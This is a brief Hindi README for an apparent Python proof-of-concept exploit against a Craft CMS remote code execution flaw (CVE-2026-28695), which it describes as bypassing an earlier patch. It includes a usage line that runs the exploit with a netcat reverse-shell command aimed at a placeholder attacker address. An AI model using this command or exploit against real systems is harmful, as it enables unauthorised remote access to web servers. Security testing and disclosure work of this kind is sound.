
CVE-2026-28695 के लिए Python PoC exploit, जो Craft CMS में एक authenticated blind RCE है जो create() BaseObject patch को bypass करता है और एक reverse shell spawn करता है।
Craft CMS में प्रमाणित ब्लाइंड रिमोट कोड एक्ज़ीक्यूशन। CVE-2026-28695 फिक्स (कमिट e31e508) में जोड़े गए create() - BaseObject प्रतिबंध को बायपास करता है।
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है। किसी भी भेद्यता का परीक्षण या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास अनुमति है!